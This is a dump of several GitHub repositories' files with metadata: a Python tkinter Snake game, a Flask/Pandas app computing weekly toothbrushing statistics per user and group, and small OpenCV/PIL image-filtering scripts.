text=\"LEVEL \" + str(level),\n font=self.font_title, fill='blue')\n self.canvas.create_text(self.screen_length // 2, self.screen_length // 2, text='Ready ? Press « space »',\n font=self.font, fill='black')\n\n def start(self, event):\n \"\"\"\n Affiche le serpent au centre de la fenêtre\n :param event:\n :param snake:\n :return:\n \"\"\"\n self.window.unbind(\"<Key-space>\")\n self.window.bind(\"<KeyPress>\", self.eval_key)\n self.canvas.delete(ALL)\n self.snake = Snake(10)\n self.apples = self.create_apples(5 * self.level)\n\n center = self.squares//2\n self.snake.body = [(center, center)]\n for x in range(1, self.snake.length//2 + 1):\n self.snake.body.insert(0, (center-x, center))\n for x in range(1, self.snake.length//2):\n self.snake.body.append((center + x, center))\n self.display()\n self.animation()\n\n def create_apples(self, number):\n \"\"\"\n Initialise une liste contenant les positions des pommes\n :param number:\n :return:\n \"\"\"\n apples = []\n for x in range(number):\n x, y = randint(0, self.squares-1), randint(0, self.squares-1)\n apples.append((x, y))\n return apples\n\n def eat_apple(self):\n \"\"\"\n Mange une pomme\n :return:\n \"\"\"\n for apple in self.apples:\n if apple in self.snake.body:\n end = self.snake.body[0]\n self.apples.remove(apple)\n self.snake.eat(end[0], end[1])\n\n def is_out(self, l):\n \"\"\"\n Vérifie si la tête du serpent est sortie de la zone\n :param l:\n :return:\n \"\"\"\n head = l[-1]\n if head[0] >= self.squares or head[0] < 0 or head[1] >= self.squares or head[1] < 0:\n return True\n return False\n\n def display_one_box(self, box, color):\n \"\"\"\n Affiche une case dans une couleur donnée\n :param box:\n :param color:\n :return:\n \"\"\"\n self.canvas.create_rectangle(box[0] * self.widthBox,\n box[1] * self.widthBox,\n box[0] * self.widthBox + (self.widthBox-1),\n box[1] * self.widthBox + (self.widthBox-1),\n fill=color,\n outline=color)\n\n def display_list(self, l, color):\n \"\"\"\n Affiche en couleur toutes les cases de la liste\n :param l:\n :param color:\n :return:\n \"\"\"\n for box in l:\n self.display_one_box(box, color)\n\n def display_snake(self, l):\n \"\"\"\n Affiche le serpent avec le corp en vert et la tête en bleu\n :param l:\n :return:\n \"\"\"\n self.display_list(l[:-1], 'green')\n self.display_one_box(l[-1], 'blue')\n\n def display(self):\n \"\"\"\n Rafraîchit l'affichage\n :return:\n \"\"\"\n self.canvas.delete(ALL)\n self.display_snake(self.snake.body)\n self.display_list(self.apples, 'red')\n\n def eval_key(self, event):\n \"\"\"\n Change la direction du serpent en fonction de la touche appuyée\n :param event:\n :return:\n \"\"\"\n if event.keysym in [\"Up\", \"Right\", \"Down\", \"Left\"]:\n self.snake.move(self.direction)\n self.direction = event.keysym\n\n def animation(self):\n \"\"\"\n Boucle principale\n :return:\n \"\"\"\n if self.is_out(self.snake.body) or self.snake.has_bitten():\n self.defeat()\n return\n if len(self.apples) == 0:\n self.victory()\n return\n self.snake.move(self.direction)\n self.eat_apple()\n self.display()\n self.window.after(40, self.animation)\n\n def next_level(self):\n \"\"\"\n Lance le niveau supérieur\n :return:\n \"\"\"\n self.level += 1\n self.direction = \"Right\"\n self.display_level_information(self.level)\n\n def defeat(self):\n \"\"\"\n Affiche le message de défaite\n :return:\n \"\"\"\n self.canvas.create_rectangle(self.screen_length//5, self.screen_length//5, self.screen_length//5*4,\n self.screen_length//5*4, fill='white')\n self.canvas.create_text(self.screen_length//2, self.screen_length//3, text=\"GAME OVER\", font=self.font,\n fill='red')\n menu = Button(self.canvas, text=\"Back to menu\", width=self.widthBox * 2, activebackground=\"#d1d1d1\",\n command=self.display_menu)\n self.canvas.create_window(self.screen_length // 2, self.screen_length // 2 + 100, window=menu)\n\n def victory(self):\n \"\"\"\n Affiche le message de victoire\n :return:\n \"\"\"\n self.canvas.create_rectangle(self.screen_length//5, self.screen_length//5, self.screen_length//5*4,\n self.screen_length//5*4, fill='white')\n self.canvas.create_text(self.screen_length//2, self.screen_length//3, text=\"VICTORY\", font=self.font,\n fill='green')\n next_level = Button(self.canvas, text=\"Next level\", width=self.widthBox * 2, activebackground=\"#d1d1d1\",\n command=self.next_level)\n self.canvas.create_window(self.screen_length // 2, self.screen_length // 2 + 50, window=next_level)\n menu = Button(self.canvas, text=\"Back to menu\", width=self.widthBox * 2, activebackground=\"#d1d1d1\",\n command=self.display_menu)\n self.canvas.create_window(self.screen_length // 2, self.screen_length // 2 + 100, window=menu)\n\n\nif __name__ == '__main__':\n Interface()"
},
{
"alpha_fraction": 0.6824966073036194,
"alphanum_fraction": 0.719131588935852,
"avg_line_length": 29.70833396911621,
"blob_id": "afdb3ecae1b139cf424d47173dd305895eb86594",
"content_id": "00032b65a7d887237832c34d4d77638569495e12",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 745,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 24,
"path": "/README.md",
"repo_name": "FlorianCahay/Snake",
"src_encoding": "UTF-8",
"text": "<div id=\"title\" align=\"center\">\n <h1>SNAKE</h1>\n <h4>Jeu du <a href=\"https://fr.wikipedia.org/wiki/Snake_(genre_de_jeu_vid%C3%A9o)\">Snake</a> en python3 avec tkinter</h4>\n <img alt=\"demo\" src=\"img.png\">\n \n</div>\n\n## But\nManger toutes les pommes du niveau pour accèder au niveau supérieur.\n\n## Règles\nLe joueur perd s'il fonce dans un mur ou s'il essaie de se manger.<br>\nQuand le serpent mange une pomme, il grandit de 3 cases.<br>\nIl faut utiliser les flèches directionnelles pour choisir la direction du serpent.<br>\n<br>\nOn peut choisir entre 3 difficultés différentes (la difficulté change la taille de l'écran) :\n- Facile (800x800)\n- Moyen (600x600)\n- Difficile (400x400)\n\n## Execution du programme\n```python\npython Main.py\n```\n"
}
] | 3 |
AdrianPayne/Data-API-Flask-Pandas | https://github.com/AdrianPayne/Data-API-Flask-Pandas | 7d0a5994dea0e410cb15a925b7c0d9d4165ec44b | a5caf2739ab0ca486e1e94d8364ef909b03eeffd | 822bf7939c6b03992e8d6080b4dbe1e8a9e53dd5 | refs/heads/main | 2023-04-25T12:20:05.903610 | 2021-05-15T13:36:18 | 2021-05-15T13:36:18 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.31305375695228577,
"alphanum_fraction": 0.654459536075592,
"avg_line_length": 35.40860366821289,
"blob_id": "edd7b5911b00ed0dc000c41371245c5c225606e4",
"content_id": "fb8007af0435be84204348d399c3ad3d17cff175",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 6772,
"license_type": "no_license",
"max_line_length": 181,
"num_lines": 186,
"path": "/README.md",
"repo_name": "AdrianPayne/Data-API-Flask-Pandas",
"src_encoding": "UTF-8",
"text": "# playbrush\n## Description\nFrom two .csv files (the first file contains offline brushing data of all participants in a\ntoothbrushing study while the second one allocates the participants into groups), the tasks\nis to extract information for each participant (identified by their PlaybrushID) and provide meaningful\ninformation that can be communicated to the user via a newsletter.\n\n## WEB APP\n### AWS url\nhttp://3.17.77.92:32768/\n\n### Local deploy\n>docker-compose build && docker-compose up \n\nurl: localhost:5000\n\n### Web documentation\nOnly one resource \n>'/'\n\n#### Method GET\nForm with two csv file inputs:\n+ rawdata\n+ groups\n\nPost submit button\n\n#### Method POST\nPrint user and group week statistical data tables\n\n### Design considerations\nAs web app requirements are simple and short, these tools has been used:\n+ Back: Flask\n+ Front: Jinja2 templates (provided by Flask)\n+ Docker to encapsulate and install the requirements\n+ GitHub actions to automate deployment in AWS ECR/ECS services (EC2 instance). Deployed with each new release!\n\n### Next steps\n+ CSS style\n+ Plot figures\n+ Test suit!!!!!\n\n## DATA TASKS\n#### Example of input & output\n -INPUT-\n RAWDATA\n PlaybrushID,TimestampUTC,UpTime,DownTime,LeftTime,RightTime,NoneTime,\n PB2500017115,Mon Sep 18 2017 08:03:18 GMT+0100 (BST),6.6,0.1,0.3,0.3,5.7,\n PB2500017115,Mon Sep 18 2017 08:06:32 GMT+0100 (BST),0,3.8,1.8,0,1.4,\n ...\n \n GROUPDATA\n group,PBID\n D,PB2500036964\n D,PB2500036963\n ...\n \n -OUTPUT-\n # Task 1 - User Information\n group, PBID, mon, tue, wed, thu, fri, sat, sun, total-brushes, twice-brushes, avg-brush-time\n \n # Task 2 - Group Dynamics\n group, total-brushes, avg-brushes, avg-brush-time, score-performance\n\n### Results\n Task 1\n group,PBID,mon,tue,wed,thu,fri,sat,sun,total-brushes,twice-brushes,avg-brush-time\n A,PB2500008778,0,0,1,1,0,0,1,3,0,37.05\n A,PB2500009123,0,1,1,1,1,1,1,6,0,50.88\n A,PB2500009543,0,0,1,1,0,1,0,3,0,44.67\n A,PB2500010644,0,0,1,1,1,0,1,4,0,55.75\n A,PB2500013900,1,0,0,0,0,0,0,1,0,35.10\n A,PB2500014533,1,0,0,0,0,0,0,1,0,45.20\n A,PB2500015032,0,2,2,0,0,0,0,4,2,33.32\n A,PB2500015176,0,0,0,0,0,2,1,3,1,21.39\n A,PB2500016085,0,0,0,0,1,0,0,1,0,28.70\n A,PB2500016302,0,0,0,1,2,1,2,6,2,48.16\n A,PB2500016413,0,1,0,0,0,1,1,3,0,83.37\n A,PB2500017260,1,1,0,0,0,0,0,2,1,60.10\n A,PB2500029113,0,2,1,0,1,0,0,4,1,25.87\n A,PB2500029403,1,0,0,0,0,0,0,1,0,24.00\n A,PB2500029467,0,0,0,0,1,2,0,3,1,31.31\n A,PB2500029535,0,0,0,0,0,0,1,1,0,35.00\n A,PB2500030275,0,0,0,0,0,0,1,1,0,43.05\n A,PB2500034769,0,0,0,2,0,0,0,2,2,53.50\n A,PB2500034873,1,0,2,1,1,0,1,6,1,83.46\n A,PB2500035145,0,1,1,0,1,1,2,6,1,83.53\n A,PB2500036593,0,0,0,0,0,0,1,1,0,30.05\n B,PB2500008735,0,0,0,0,1,0,0,1,0,35.05\n B,PB2500008867,0,0,0,1,0,1,0,2,1,27.02\n B,PB2500009228,0,0,0,2,0,0,0,2,2,38.62\n B,PB2500009352,0,0,0,0,0,1,0,1,0,94.05\n B,PB2500009374,0,0,1,1,1,1,0,4,0,32.27\n B,PB2500009705,0,0,0,0,0,1,1,2,1,59.03\n B,PB2500009814,1,0,0,0,0,0,0,1,0,22.00\n B,PB2500010542,0,0,0,0,1,1,1,3,0,100.77\n B,PB2500010629,0,0,0,0,2,1,2,5,2,81.66\n B,PB2500014851,0,0,1,0,0,0,0,1,0,28.05\n B,PB2500017115,1,1,0,1,1,0,0,4,0,64.35\n B,PB2500029003,0,0,0,1,0,0,0,1,0,45.05\n B,PB2500029118,0,1,2,2,2,2,2,11,5,79.42\n B,PB2500029572,0,0,0,0,1,0,1,2,1,30.52\n B,PB2500029755,0,0,0,0,1,0,0,1,0,64.05\n B,PB2500034402,0,0,0,0,0,0,1,1,0,24.00\n B,PB2500035239,1,2,1,1,0,0,1,6,1,122.92\n B,PB2500035308,0,0,0,1,1,1,0,3,0,36.72\n B,PB2500035330,0,0,0,0,0,1,0,1,0,20.95\n B,PB2500035411,0,0,0,1,2,1,1,5,1,60.34\n B,PB2500036585,0,0,0,0,1,1,0,2,1,28.52\n B,PB2500036671,0,0,0,1,0,1,0,2,1,71.95\n C,PB2500008196,0,0,0,1,1,2,1,5,1,55.38\n C,PB2500008248,0,0,0,2,2,2,2,8,4,56.02\n C,PB2500008549,0,1,2,1,1,1,2,8,2,44.53\n C,PB2500008951,2,2,1,2,2,1,2,12,5,59.80\n C,PB2500008956,0,0,0,1,2,1,2,6,2,108.62\n C,PB2500009101,0,2,2,2,1,1,1,9,3,67.06\n C,PB2500009201,0,1,2,2,2,2,2,11,5,128.25\n C,PB2500009375,0,0,0,0,0,2,2,4,2,77.49\n C,PB2500010328,0,0,2,2,1,1,1,7,2,39.66\n C,PB2500010630,0,1,0,2,1,2,0,6,2,38.60\n C,PB2500014415,0,0,0,1,1,1,0,3,0,52.02\n C,PB2500014442,0,0,0,2,1,1,2,6,2,73.16\n C,PB2500014740,0,0,0,2,2,2,2,8,4,95.82\n C,PB2500016077,0,2,0,0,1,2,0,5,2,27.53\n C,PB2500016479,0,0,0,1,1,0,1,3,0,48.35\n C,PB2500029848,0,0,0,0,1,2,2,5,2,88.74\n C,PB2500034762,0,0,0,0,0,2,2,4,2,113.04\n C,PB2500034890,0,0,0,1,2,2,2,7,3,52.03\n C,PB2500034972,0,1,2,2,2,2,1,10,4,122.95\n C,PB2500035170,0,1,2,2,1,1,2,9,3,77.76\n C,PB2500036366,0,0,0,0,0,0,1,1,0,89.00\n C,PB2500036703,0,0,0,1,2,2,2,7,3,55.78\n C,PB2500036788,2,2,2,2,2,1,2,13,6,88.24\n D,PB2500008565,1,2,2,1,2,2,1,11,4,78.99\n D,PB2500009146,0,2,2,2,2,0,0,8,4,130.01\n D,PB2500009220,0,0,0,1,1,0,0,2,1,42.05\n D,PB2500009446,0,0,0,0,1,2,2,5,2,114.91\n D,PB2500009709,0,0,0,2,1,2,2,7,3,73.78\n D,PB2500010636,0,0,0,1,0,0,0,1,0,24.05\n D,PB2500014435,0,1,2,0,0,2,2,7,3,33.16\n D,PB2500014494,0,2,2,2,2,1,2,11,5,83.89\n D,PB2500014596,0,0,0,0,1,1,1,3,0,48.02\n D,PB2500014762,0,0,0,0,1,2,1,4,1,137.70\n D,PB2500016490,0,2,0,1,1,1,1,6,1,56.82\n D,PB2500017485,0,0,0,0,1,2,2,5,2,73.93\n D,PB2500029001,0,0,0,1,1,2,2,6,2,52.42\n D,PB2500029510,2,0,1,0,0,0,0,3,1,26.75\n D,PB2500029526,0,0,0,0,1,2,1,4,1,86.71\n D,PB2500030280,0,1,2,0,2,2,1,8,3,52.90\n D,PB2500034756,0,0,0,0,0,1,2,3,1,133.88\n D,PB2500034872,1,1,2,1,1,2,1,9,2,64.79\n D,PB2500035119,0,0,1,1,1,0,2,5,1,56.94\n D,PB2500035317,0,0,0,2,2,1,1,6,2,83.39\n D,PB2500035373,1,2,2,2,2,2,2,13,6,49.35\n D,PB2500035479,0,0,0,2,1,2,1,6,2,64.34\n D,PB2500036660,0,1,2,2,2,2,2,11,5,103.23\n D,PB2500036764,0,0,0,0,1,0,0,1,0,64.05\n D,PB2500036963,0,2,1,2,2,1,1,9,3,25.69\n D,PB2500036964,0,0,0,0,2,2,2,6,3,119.88\n\n---\n\n Task 2\n group,total-brushes,avg-brush-time,avg-brushes,score-performance\n C,157,72.17,6.83,492.61\n D,160,72.37,6.15,445.35\n B,61,53.06,2.77,147.12\n A,62,45.40,2.95,134.05\n\n\n### Execute in local\n+ Create a virtual environment \n > python3 -m venv /path/to/new/virtual/env\n+ Install project dependencies \n >pip install -r playbrush_api/requirements.txt\n+ Execute task.py\n >python3 data_tasks.py\n\n### Design considerations\n+ Python 3.7.7\n+ Use of Pandas and Numpy libraries because include cleaning, transforming, manipulating and analyzing data \nefficient methods\n+ Use of FP (avoiding POO) to make the code easier to read (jupyter notebook style) and not affecting performance\n+ For question:\n >Which group performed the best?\n + The option that does not penalize for the number of members within each group has been selected, the result of multiplying the brushing averages and time per brushing per user\n"
},
{
"alpha_fraction": 0.6171039938926697,
"alphanum_fraction": 0.622934877872467,
"avg_line_length": 29.264705657958984,
"blob_id": "6f08a053ef7257d50b275c852c88ca06a8524c5e",
"content_id": "900b2ad93890909681877a039e4312a1be359525",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1029,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 34,
"path": "/playbrush_api/app.py",
"repo_name": "AdrianPayne/Data-API-Flask-Pandas",
"src_encoding": "UTF-8",
"text": "import io\nfrom flask import Flask, render_template, request\n\nfrom brush_stats import week_stats\n\napp = Flask(__name__)\n\n\[email protected](\"/\", methods=(\"GET\", \"POST\"))\ndef week_stats_view():\n if request.method == \"GET\":\n return render_template('main.html')\n\n elif request.method == \"POST\":\n\n rawdata_csv = request.files[\"rawdata\"]\n groups_csv = request.files[\"groupsdata\"]\n\n rawdata_csv = io.StringIO(rawdata_csv.stream.read().decode(\"UTF8\"), newline=None)\n groups_csv = io.StringIO(groups_csv.stream.read().decode(\"UTF8\"), newline=None)\n\n try:\n user_stats, group_stats = week_stats(rawdata_csv, groups_csv)\n error_message = None\n except:\n user_stats= None\n group_stats = None\n error_message='ERROR WITH CSV FILES. Upload them again'\n\n return render_template('main.html', user_stats=user_stats, group_stats=group_stats, error_message=error_message)\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=True)\n"
},
{
"alpha_fraction": 0.6209677457809448,
"alphanum_fraction": 0.6317204236984253,
"avg_line_length": 25.571428298950195,
"blob_id": "dac1969d6f8a6c0ae2788b10d4e4226dbc1eb2af",
"content_id": "c477edee2f8d08c44eee348d41d5ab4da809fbd1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 372,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 14,
"path": "/data_tasks.py",
"repo_name": "AdrianPayne/Data-API-Flask-Pandas",
"src_encoding": "UTF-8",
"text": "from playbrush_api.brush_stats import week_stats\n\nif __name__ == \"__main__\":\n\n raw_path = 'data/1_rawdata.csv'\n group_path = 'data/2_groups.csv'\n\n with open(raw_path) as raw_csv, open(group_path) as groups_csv:\n user_stats, group_stats = week_stats(raw_csv, groups_csv)\n\n print('Task 1')\n print(user_stats)\n print('Task 2')\n print(group_stats)\n"
},
{
"alpha_fraction": 0.5822784900665283,
"alphanum_fraction": 0.607594907283783,
"avg_line_length": 18.75,
"blob_id": "9487db11ef00a82596c22c1266ae448feeda6d6d",
"content_id": "36782e5f5054fb373b2e55530879b19d23ae5db3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 79,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 4,
"path": "/playbrush_api/__init__.py",
"repo_name": "AdrianPayne/Data-API-Flask-Pandas",
"src_encoding": "UTF-8",
"text": "from .brush_stats import week_stats\n\n__version__ = '2.0'\n__author__ = 'Adrian Sacristan'\n"
},
{
"alpha_fraction": 0.43023255467414856,
"alphanum_fraction": 0.5174418687820435,
"avg_line_length": 18.11111068725586,
"blob_id": "72dc911c96d0fe81f6305fec7985a0c5cec3f9e8",
"content_id": "0e8451b6f4a9c090ca149afed87ac7056d0291e1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "YAML",
"length_bytes": 172,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 9,
"path": "/docker-compose.yml",
"repo_name": "AdrianPayne/Data-API-Flask-Pandas",
"src_encoding": "UTF-8",
"text": "version: '3.8'\nservices:\n api-playbrush:\n build: ./playbrush_api/\n ports:\n - 5000:5000\n environment:\n PORT: 5000\n FLASK_DEBUG: 1\n"
},
{
"alpha_fraction": 0.6043665409088135,
"alphanum_fraction": 0.6094938516616821,
"avg_line_length": 46.234375,
"blob_id": "57fc5730632a2f711c9761ebc14d07d27393e411",
"content_id": "d277a00e0159c59d16a238c052bd4ec14b3eecf7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6046,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 128,
"path": "/playbrush_api/brush_stats.py",
"repo_name": "AdrianPayne/Data-API-Flask-Pandas",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nimport numpy as np\nimport warnings\n\npd.options.mode.chained_assignment = None\nwarnings.simplefilter(action='ignore', category=pd.errors.PerformanceWarning)\n\n\ndef preprocess_data(raw_df, groups_df):\n \"\"\"Steps:\n Clean NaN\n Def time variable\n Sort\n \"\"\"\n # Clean NaN\n raw_df = raw_df.dropna()\n groups_df = groups_df.dropna()\n\n # Def time variable\n raw_df['TimestampUTC'] = pd.to_datetime(raw_df['TimestampUTC'])\n\n # POSSIBLE EXCEPTION: disorder\n return raw_df.sort_values(by=['PlaybrushID', 'TimestampUTC']), groups_df.sort_values(by=['group', 'PBID'])\n\n\ndef week_stats(raw_csv, groups_csv):\n \"\"\"\n Provides two CSV files with user and group week statistic data\n :param raw_csv:\n :param groups_csv:\n :return:\n \"\"\"\n # Task 1 - User Information\n # OUT: group, PBID, mon, tue, wed, thu, fri, sat, sun, total-brushes, twice-brushes, avg-brush-time\n\n # Read CSV & convert to DataFrame\n raw_df = pd.read_csv(raw_csv, usecols=range(7))\n groups_df = pd.read_csv(groups_csv)\n\n raw_df, groups_df = preprocess_data(raw_df, groups_df)\n\n # Merge brush sessions that are less than 2minutes apart into a single brush session\n threshold_selector_time = (raw_df.TimestampUTC - raw_df.TimestampUTC.shift(1)) > pd.Timedelta(seconds=120)\n threshold_selector_user = raw_df.PlaybrushID != raw_df.PlaybrushID.shift(1)\n groups_time = threshold_selector_time.cumsum()\n groups_user = threshold_selector_user.cumsum()\n raw_df = raw_df.groupby([groups_time, groups_user]).agg({'PlaybrushID': min, 'TimestampUTC': min, 'UpTime': sum,\n 'DownTime': sum, 'LeftTime': sum, 'RightTime': sum,\n 'NoneTime': sum})\n\n # Sum all movements times\n raw_df['brush_time'] = raw_df[['UpTime', 'DownTime', 'LeftTime', 'RightTime', 'NoneTime']].sum(axis=1)\\\n .drop(columns=['UpTime', 'DownTime', 'LeftTime', 'RightTime', 'NoneTime'])\n\n # Discard brush sessions that are less than 20 seconds in total\n raw_df = raw_df[raw_df['brush_time'] >= 20.0]\n\n # When a user brushes multiple times in a morning or an evening, record the longest brush and discard\n # the others. 2pm is a morning brush while every brush after 2pm is an evening brush.\n\n # New column for morning (True) and afternoon (False) brushes\n raw_df['morning'] = raw_df['TimestampUTC'].dt.hour <= 14\n\n # New column from weekday & drop TimestampUTC\n raw_df['weekday'] = raw_df['TimestampUTC'].dt.day_name().drop(columns=['TimestampUTC'])\n\n # Group by user, weekday, morning/afternoon\n threshold_selector_user = raw_df.PlaybrushID != raw_df.PlaybrushID.shift(1)\n threshold_selector_weekday = raw_df.weekday != raw_df.weekday.shift(1)\n threshold_selector_morning = raw_df.morning != raw_df.morning.shift(1)\n groups_user = threshold_selector_user.cumsum()\n groups_weekday = threshold_selector_weekday.cumsum()\n groups_morning = threshold_selector_morning.cumsum()\n raw_df = raw_df.groupby([groups_user, groups_weekday, groups_morning]).\\\n agg({'PlaybrushID': min, 'brush_time': max, 'morning': min, 'weekday': min}).reset_index(drop=True)\n\n # Add groups\n raw_df = pd.merge(raw_df, groups_df, how='left', left_on='PlaybrushID', right_on='PBID').drop(columns=['PBID'])\n\n # Split brushes per weekday\n raw_df = raw_df.groupby(['group', 'PlaybrushID', 'weekday']).agg(['mean', 'count']).drop(columns=['morning'])\n raw_df.reset_index(inplace=True)\n raw_df['avg-brush-time'] = raw_df.brush_time['mean']\n raw_df['count'] = raw_df.brush_time['count']\n raw_df = raw_df.drop(columns=['brush_time'])\n\n raw_df = raw_df.pivot(index=['group', 'PlaybrushID', 'avg-brush-time'], columns=\"weekday\", values='count')\n\n raw_df.reset_index(inplace=True)\n raw_df = raw_df.groupby(['group', 'PlaybrushID']).agg({'avg-brush-time': np.mean, 'Monday': sum, 'Tuesday': sum,\n 'Wednesday': sum, 'Thursday': sum, 'Friday': sum,\n 'Saturday': sum, 'Sunday': sum})\n\n # total-brushes\n raw_df['total-brushes'] = raw_df[['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday',\n 'Sunday']].sum(axis=1)\n\n # twice-brushes\n raw_df['twice-brushes'] = raw_df[raw_df == 2.0].count(axis=1)\n\n # reorder and format\n cols = raw_df.columns.tolist()[1:] + raw_df.columns.tolist()[:1]\n raw_df = raw_df[cols]\n raw_df = raw_df.rename(columns={\"Monday\": \"mon\", \"Tuesday\": \"tue\", \"Wednesday\": \"wed\", \"Thursday\": \"thu\",\n \"Friday\": \"fri\", \"Saturday\": \"sat\", 'Sunday': 'sun'})\n raw_df.index.names = ['group', 'PBID']\n raw_df = raw_df.astype({'mon': int, 'tue': int, 'wed': int, 'thu': int, 'fri': int, 'sat': int, 'sun': int,\n 'total-brushes': int})\n\n # Task 2 - Group Dynamics\n # OUT: group, total-brushes, avg-brushes, avg-brush-time, score-performance\n group_dynamic_df = raw_df.copy()\n group_dynamic_df.reset_index(inplace=True)\n\n group_dynamic_df = group_dynamic_df.drop(columns=['PBID', 'mon', 'tue', 'wed', 'thu', 'fri', 'sat', 'sun',\n 'twice-brushes'], axis=1)\n\n group_dynamic_df['avg-brushes'] = group_dynamic_df['total-brushes']\n\n group_dynamic_df = group_dynamic_df.groupby(['group']).agg({'total-brushes': sum, 'avg-brush-time': np.mean,\n 'avg-brushes': np.mean})\n\n # score-performance is the result of average brush time vs average brushes\n group_dynamic_df['score-performance'] = group_dynamic_df['avg-brush-time'] * group_dynamic_df['avg-brushes']\n\n group_dynamic_df = group_dynamic_df.sort_values(by=['score-performance'], ascending=False)\n\n return raw_df.to_csv(float_format='%.2f'), group_dynamic_df.to_csv(float_format='%.2f')\n"
}
] | 6 |
Yurwar/python-image-processing | https://github.com/Yurwar/python-image-processing | da88909f81dc552662957fbfd3f35d83dda523a1 | 573da05530b8bbea4c3d9d0bdd375ddef68ccbc5 | 7984fdf4718e3b57ffc7ef1ac9c7f376ca4c21d4 | refs/heads/master | 2022-09-20T07:17:20.727184 | 2020-06-02T10:31:59 | 2020-06-02T10:31:59 | 268,105,598 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6480836272239685,
"alphanum_fraction": 0.700348436832428,
"avg_line_length": 22.91666603088379,
"blob_id": "84ca3866dd0881bcd87cdf7ea749a9cb51530e95",
"content_id": "47465b4e863985eab726016e2cd6e009dba330bc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 287,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 12,
"path": "/opencv-sobel-edge-detection.py",
"repo_name": "Yurwar/python-image-processing",
"src_encoding": "UTF-8",
"text": "import cv2.cv2 as cv2\nfrom matplotlib import pyplot\n\nimage = cv2.imread('images/man_feels_aversion.jpg', 0)\n\nsobelX = cv2.Sobel(image, -1, 1, 0, ksize=5)\n\nsobelY = cv2.Sobel(image, -1, 0, 1, ksize=5)\n\npyplot.imshow(sobelX, cmap='gray')\n# pyplot.imshow(sobelY, cmap='gray')\npyplot.show()\n"
},
{
"alpha_fraction": 0.7227723002433777,
"alphanum_fraction": 0.7524752616882324,
"avg_line_length": 25.933332443237305,
"blob_id": "bde1e6e7b77750753175767bdc9130993ba4b84d",
"content_id": "f02c78d3be7ce33be7990cbaab060dccbc1b5053",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 404,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 15,
"path": "/gray-level-transform.py",
"repo_name": "Yurwar/python-image-processing",
"src_encoding": "UTF-8",
"text": "from PIL import Image\nfrom pylab import *\n\nINTERVAL_END = 255.0\nINTERVAL_START = 100.0\nNEGATION_C = 255\n\noriginalImage = array(Image.open('images/doctor.jpg').convert('L'))\ngray()\nnegativeImage = NEGATION_C - originalImage\nclampedImage = (INTERVAL_START / NEGATION_C) * originalImage + INTERVAL_START\ntransformedImage = INTERVAL_END * (originalImage / INTERVAL_END) ** 2\n\nimshow(transformedImage)\nshow()\n"
},
{
"alpha_fraction": 0.744027316570282,
"alphanum_fraction": 0.7576791644096375,
"avg_line_length": 35.625,
"blob_id": "8b9e68e87a8f63d749c22fad5642291596c8fe31",
"content_id": "f182600bb040b91346cd527deddaaa80f9a08c4d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 293,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 8,
"path": "/neighborhood-median-filter.py",
"repo_name": "Yurwar/python-image-processing",
"src_encoding": "UTF-8",
"text": "import scipy.ndimage\nfrom PIL import Image\n\noriginalImage = Image.open('images/man_and_child.jpg')\nb = scipy.ndimage.filters.median_filter(originalImage, size=5, footprint= None,output=None, mode='reflect', cval=0.0, origin=0)\nb = Image.fromarray(b)\n\nb.save('images/median_man_and_child.jpg')\n"
},
{
"alpha_fraction": 0.7246376872062683,
"alphanum_fraction": 0.739130437374115,
"avg_line_length": 26.600000381469727,
"blob_id": "a7f7080b3984d198a8971c1a50cc7bac06f3255f",
"content_id": "67acf0f87fba0de0a37d109acb29356ce762142a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 276,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 10,
"path": "/neighborhood-mean-filter.py",
"repo_name": "Yurwar/python-image-processing",
"src_encoding": "UTF-8",
"text": "import numpy\nfrom PIL import Image\nimport scipy.ndimage\n\noriginalImage = Image.open('images/man_and_child.jpg').convert('L')\n\nkoef = numpy.ones((5, 5)) / 25\nb = scipy.ndimage.filters.convolve(originalImage, koef)\nb = Image.fromarray(b)\nb.save('images/mean_man_and_child.jpg')\n"
}
] | 4 |
ashokgaire/project_EULER | https://github.com/ashokgaire/project_EULER | 3860a6530221123410566ea32b24a4b5de39a19e | b22cf37d1855b08f8cb38eb819e0ff85aa251058 | 19ef0c28258de6c06d7b64b85046160a83326a27 | refs/heads/main | 2023-03-31T02:11:51.467492 | 2021-04-05T06:24:28 | 2021-04-05T06:24:28 | 353,710,437 | 0 | 0 | null | 2021-04-01T13:31:17 | 2021-04-04T15:17:04 | 2021-04-05T06:24:28 | Python | [
{
"alpha_fraction": 0.4705035984516144,
"alphanum_fraction": 0.5208632946014404,
"avg_line_length": 16.820512771606445,
"blob_id": "1ce53383ff189948bdf1853c14ce8569eaab75ef",
"content_id": "af0ab2cf338fa83c0f52a59e0821a2649469fc40",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 695,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 39,
"path": "/difficulty(5%)/special_pythagorean_triplet.py",
